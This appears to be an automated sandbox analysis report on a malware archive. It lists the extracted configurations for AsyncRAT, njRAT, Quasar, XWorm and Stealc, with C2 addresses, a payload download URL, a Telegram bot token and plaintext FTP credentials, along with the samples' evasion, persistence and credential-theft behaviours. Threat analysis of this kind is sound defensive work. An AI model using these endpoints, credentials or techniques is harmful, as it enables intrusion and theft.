asyncrat | 16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267

max time kernel
296s
max time network
808s
platform
windows10-2004_x64
resource
win10v2004-20241007-uk
resource tags

arch:x64arch:x86image:win10v2004-20241007-uklocale:uk-uaos:windows10-2004-x64systemwindows
submitted
27-11-2024 20:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Downloaders.zip
Size

12KB
MD5

94fe78dc42e3403d06477f995770733c
SHA1

ea6ba4a14bab2a976d62ea7ddd4940ec90560586
SHA256

16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267
SHA512

add85726e7d2c69068381688fe84defe820f600e6214eff029042e3002e9f4ad52dde3b8bb28f4148cca1b950cd54d3999ce9e8445c4562d1ef2efdb1c6bdeff
SSDEEP

384:6BfwcSEp9ZjKXSBIDv4dDfjlMJ7HWTHWB:efACW6Dr8HWTHWB

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://bitbucket.org/superappsss/1/downloads/papa_hr_build.exe

Extracted

Credentials

Protocol: ftp
Host:
ftpcluster.loopia.se
Port:
21
Username:
srbreferee.com
Password:
luka2005

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

127.0.0.1:4449

135.181.185.254:4449

Mutex

fssssssshsfhs444fdf%dfs

Attributes

delay
11
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

njrat

Version

Njrat 0.7 Golden By Hassan Amiri

Botnet

HacKed

82.193.104.21:5137

Mutex

Windows Update

Attributes

reg_key
Windows Update
splitter
|Hassan|

Extracted

Family

quasar

Version

1.4.1

Botnet

Main

tpinauskas-54803.portmap.host:54803

Mutex

8422dcc2-b8bd-4080-a017-5b62524b6546

Attributes

encryption_key
2EFF7393DC1BD9FBDDD61A780B994B8166BAB8EC
install_name
Win64.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Win64
subdirectory
SubDir

Extracted

Family

xworm

127.0.0.1:6000

103.211.201.109:6000

Attributes

Install_directory
%AppData%
install_file
XClient.exe
telegram
https://api.telegram.org/bot7929370892:AAGwrX5TeyxQidZdAEm_Z6-CDvPUOQzVY1M

Extracted

Family

stealc

Botnet

default

http://185.215.113.17

Attributes

url_path
/2fb6c2cc8dce150a.php

Extracted

Family

xworm

Version

5.0

68.178.207.33:7000

Mutex

sSM7p4MT4JctLnRS

Attributes

install_file
USB.exe

aes.plain

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

107.175.202.158:6606

107.175.202.158:30814

107.175.202.158:25565

107.175.202.158:443

Mutex

anQK5EUHL5vU

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Detect Xworm Payload 4 IoCs

Processes:

resource	yara_rule
behavioral1/files/0x0011000000023c82-6818.dat	family_xworm
behavioral1/memory/5156-6822-0x0000000000460000-0x0000000000476000-memory.dmp	family_xworm
behavioral1/files/0x0008000000023d12-7147.dat	family_xworm
behavioral1/memory/2544-7151-0x0000000000C80000-0x0000000000C8E000-memory.dmp	family_xworm

Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
trojan spyware stealer lokibot
Lokibot family
lokibot
Njrat family
njrat
Phorphiex family
phorphiex

Phorphiex payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/files/0x000a000000023d53-15339.dat	family_phorphiex

Phorphiex, Phorpiex
Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.
worm trojan loader phorphiex
Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 2 IoCs

Processes:

resource	yara_rule
behavioral1/files/0x0008000000023c6c-6228.dat	family_quasar
behavioral1/memory/4668-6232-0x0000000000810000-0x0000000000B50000-memory.dmp	family_quasar

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/files/0x000a000000023dc3-15232.dat	family_redline

Redline family
redline
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

Winsvc.exe

description	pid	Process	procid_target
PID 5108 created 3448	5108	Winsvc.exe	56

Xmrig family
xmrig
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
behavioral1/files/0x0009000000023d3f-7633.dat	family_asyncrat

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

unik.exerandom.exerandom.exeunik.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	unik.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	random.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	random.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	unik.exe

XMRig Miner payload 1 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/6148-5498-0x00007FF7453C0000-0x00007FF746010000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
552	powershell.exe
2952	powershell.exe
1148	powershell.exe
7016	powershell.exe
5616	powershell.exe
6488	powershell.exe
584	powershell.exe
3652	powershell.exe
1620	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 5 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

Processes:

netsh.exenetsh.exenetsh.exenetsh.exenetsh.exe

pid	Process
1204	netsh.exe
3612	netsh.exe
6276	netsh.exe
1892	netsh.exe
7076	netsh.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Uses browser remote debugging 2 TTPs 18 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

Processes:

msedge.exemsedge.exechrome.exemsedge.exemsedge.exechrome.exechrome.exechrome.exechrome.exechrome.exemsedge.exechrome.exemsedge.exemsedge.exechrome.exemsedge.exemsedge.exemsedge.exe

pid	Process
7140	msedge.exe
512	msedge.exe
1968	chrome.exe
180	msedge.exe
1804	msedge.exe
5112	chrome.exe
4740	chrome.exe
3516	chrome.exe
1188	chrome.exe
4300	chrome.exe
5284	msedge.exe
684	chrome.exe
6604	msedge.exe
5596	msedge.exe
4172	chrome.exe
6352	msedge.exe
6308	msedge.exe
6216	msedge.exe

Checks BIOS information in registry 2 TTPs 8 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

random.exerandom.exeunik.exeunik.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	random.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	random.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	random.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	unik.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	unik.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	unik.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	unik.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	random.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Win64.exeWin64.exetrojan.exetrojan.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	Win64.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	Win64.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	trojan.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	trojan.exe

Drops startup file 8 IoCs

Processes:

taskmgr.exeWinsvc.exeserver.exe

description	ioc	Process
File opened for modification	\??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\a36391a4d2e3933c790f3bc33ca8c666windows update.exe	taskmgr.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StackTrace.vbs	Winsvc.exe
File opened for modification	\??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\stacktrace.vbs	taskmgr.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	server.exe
File opened for modification	\??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\microsoft corporation.exe	taskmgr.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a36391a4d2e3933c790f3bc33ca8c666Windows Update.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a36391a4d2e3933c790f3bc33ca8c666Windows Update.exe	server.exe

Executes dropped EXE 34 IoCs

Processes:

Winsvc.exeTPB-1.exegvndxfghs.exegvndxfghs.exegvndxfghs.exegvndxfghs.exerandom.exeunik.exexblkpfZ8Y4.exetrojan.exetest28.exetest26.exeserver.exetest27.exetest29.exetest24.execbchr.exetrojan.exeserver.execbchr.exetest24.exeunik.exerandom.exegvndxfghs.exegvndxfghs.exegvndxfghs.exegvndxfghs.exeServer.exebp.exeAmogus.exeWin64.exeTPB-1.exeServer1.exeWin64.exe

pid	Process
5108	Winsvc.exe
3924	TPB-1.exe
4372	gvndxfghs.exe
2892	gvndxfghs.exe
4188	gvndxfghs.exe
2880	gvndxfghs.exe
3664	random.exe
6036	unik.exe
6148	xblkpfZ8Y4.exe
6728	trojan.exe
6024	test28.exe
5612	test26.exe
2172	server.exe
7152	test27.exe
4748	test29.exe
7128	test24.exe
2428	cbchr.exe
5428	trojan.exe
5632	server.exe
2640	cbchr.exe
312	test24.exe
5588	unik.exe
4892	random.exe
5760	gvndxfghs.exe
6728	gvndxfghs.exe
2908	gvndxfghs.exe
6324	gvndxfghs.exe
6436	Server.exe
6692	bp.exe
4668	Amogus.exe
6384	Win64.exe
6964	TPB-1.exe
3016	Server1.exe
4584	Win64.exe

Identifies Wine through registry keys 2 TTPs 4 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

random.exeunik.exeunik.exerandom.exe

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine	random.exe
Key opened	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine	unik.exe
Key opened	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine	unik.exe
Key opened	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine	random.exe

Loads dropped DLL 2 IoCs

Processes:

cbchr.execbchr.exe

pid	Process
2428	cbchr.exe
2640	cbchr.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs

collection

Email Collection

T1114

Processes:

gvndxfghs.exegvndxfghs.exe

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	gvndxfghs.exe
Key opened	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	gvndxfghs.exe
Key opened	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	gvndxfghs.exe
Key opened	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	gvndxfghs.exe
Key opened	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	gvndxfghs.exe
Key opened	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	gvndxfghs.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

Server.exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "\"C:\\Users\\Admin\\Desktop\\Files\\Server.exe\" .."	Server.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Update = "\"C:\\Users\\Admin\\Desktop\\Files\\Server.exe\" .."	Server.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Legitimate hosting services abused for malware hosting/C2 1 TTPs 14 IoCs

Web Service

T1102

Processes:

flow	ioc
119	bitbucket.org
198	bitbucket.org
321	bitbucket.org
334	raw.githubusercontent.com
39	raw.githubusercontent.com
197	bitbucket.org
320	bitbucket.org
362	bitbucket.org
38	raw.githubusercontent.com
113	raw.githubusercontent.com
117	bitbucket.org
138	bitbucket.org
184	raw.githubusercontent.com
375	bitbucket.org

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
349	ip-api.com

Network Service Discovery 1 TTPs 1 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

Processes:

arp.exe

pid	Process
2900	arp.exe

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

Processes:

powercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exe

pid	Process
5948	powercfg.exe
6896	powercfg.exe
4296	powercfg.exe
6768	powercfg.exe
6312	powercfg.exe
6348	powercfg.exe
1416	powercfg.exe
5652	powercfg.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
behavioral1/files/0x000d000000023c9e-6912.dat	autoit_exe

Drops autorun.inf file 1 TTPs 4 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

Processes:

server.exe

description	ioc	Process
File created	C:\autorun.inf	server.exe
File opened for modification	C:\autorun.inf	server.exe
File created	F:\autorun.inf	server.exe
File opened for modification	F:\autorun.inf	server.exe

Drops file in System32 directory 1 IoCs

Processes:

4363463463464363463463463.exe

description	ioc	Process
File created	C:\Windows\SysWOW64\Files\main.exe	4363463463464363463463463.exe

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exe

pid	Process
3808	tasklist.exe
6504	tasklist.exe
1928	tasklist.exe
6088	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

Processes:

random.exeunik.exeunik.exerandom.exe

pid	Process
3664	random.exe
6036	unik.exe
5588	unik.exe
4892	random.exe

Suspicious use of SetThreadContext 10 IoCs

Processes:

gvndxfghs.exeWinsvc.execbchr.exeInstallUtil.execbchr.exegvndxfghs.exe

description	pid	Process	procid_target
PID 4372 set thread context of 2892	4372	gvndxfghs.exe	125
PID 4372 set thread context of 4188	4372	gvndxfghs.exe	126
PID 4372 set thread context of 2880	4372	gvndxfghs.exe	127
PID 5108 set thread context of 4460	5108	Winsvc.exe	144
PID 2428 set thread context of 4980	2428	cbchr.exe	183
PID 4460 set thread context of 6092	4460	InstallUtil.exe	189
PID 2640 set thread context of 6252	2640	cbchr.exe	202
PID 5760 set thread context of 6728	5760	gvndxfghs.exe	216
PID 5760 set thread context of 2908	5760	gvndxfghs.exe	217
PID 5760 set thread context of 6324	5760	gvndxfghs.exe	218

UPX packed file 7 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/files/0x000200000002305c-5368.dat	upx
behavioral1/memory/6148-5372-0x00007FF7453C0000-0x00007FF746010000-memory.dmp	upx
behavioral1/memory/6148-5498-0x00007FF7453C0000-0x00007FF746010000-memory.dmp	upx
behavioral1/files/0x0008000000023c9a-6976.dat	upx
behavioral1/memory/7084-6981-0x0000000000400000-0x000000000042B000-memory.dmp	upx
behavioral1/memory/7084-7017-0x0000000000400000-0x000000000042B000-memory.dmp	upx
behavioral1/memory/7084-7255-0x0000000000400000-0x000000000042B000-memory.dmp	upx

Launches sc.exe 6 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exe

pid	Process
1376	sc.exe
768	sc.exe
7176	sc.exe
348	sc.exe
3628	sc.exe
2024	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 15 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

Processes:

netsh.exenetsh.exenetsh.exenetsh.exenetsh.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Program crash 17 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	Process	procid_target
4112	2428	WerFault.exe	178
5972	2640	WerFault.exe	200
2076	5588	WerFault.exe	213
6320	4892	WerFault.exe	214
972	6964	WerFault.exe	240
4712	6724	WerFault.exe	355
5228	5440	WerFault.exe	360
5012	5440	WerFault.exe	360
5204	2820	WerFault.exe	385
524	6652	WerFault.exe	381
5372	1720	WerFault.exe	426
3628	7016	WerFault.exe	642
3652	7024	WerFault.exe	635
4996	4668	WerFault.exe	622
7916	6100	WerFault.exe	658
7576	7028	WerFault.exe	670
7608	6368	WerFault.exe	756

System Location Discovery: System Language Discovery 1 TTPs 30 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

netsh.exeMSBuild.exerandom.exeTPB-1.exegvndxfghs.exeunik.exeserver.exenetsh.exegvndxfghs.exenetsh.exeServer1.exenetsh.exe4363463463464363463463463.execbchr.exenetsh.exegvndxfghs.exetrojan.exegvndxfghs.exegvndxfghs.exe4363463463464363463463463.exe4363463463464363463463463.exeMSBuild.execbchr.exeserver.exeServer.exeTPB-1.exetrojan.exegvndxfghs.exerandom.exeunik.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	random.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TPB-1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	gvndxfghs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	unik.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	gvndxfghs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cbchr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	gvndxfghs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	trojan.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	gvndxfghs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	gvndxfghs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cbchr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TPB-1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	trojan.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	gvndxfghs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	random.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	unik.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 24 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

Processes:

PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEcmd.exePING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEcmd.exePING.EXE

pid	Process
5508	PING.EXE
5772	PING.EXE
5648	PING.EXE
5436	PING.EXE
5648	PING.EXE
6352	PING.EXE
3728	PING.EXE
7848	PING.EXE
5656	PING.EXE
416	cmd.exe
1752	PING.EXE
2540	PING.EXE
2240	PING.EXE
5956	PING.EXE
6208	PING.EXE
3700	PING.EXE
4756	PING.EXE
3648	PING.EXE
1796	PING.EXE
212	PING.EXE
5228	PING.EXE
4884	PING.EXE
3484	cmd.exe
112	PING.EXE

NSIS installer 1 IoCs

installer

Processes:

resource	yara_rule
behavioral1/files/0x0007000000023d46-13830.dat	nsis_installer_2

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

taskmgr.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Checks processor information in registry 2 TTPs 9 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

taskmgr.exeTPB-1.exemsedge.exeTPB-1.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	TPB-1.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	taskmgr.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	TPB-1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	TPB-1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	TPB-1.exe

Delays execution with timeout.exe 1 IoCs

evasion

Processes:

timeout.exe

pid	Process
2020	timeout.exe

Detects videocard installed 1 TTPs 2 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

Processes:

wmic.exewmic.exe

pid	Process
1720	wmic.exe
3252	wmic.exe

Enumerates system info in registry 2 TTPs 11 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exemsedge.exechrome.exechrome.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
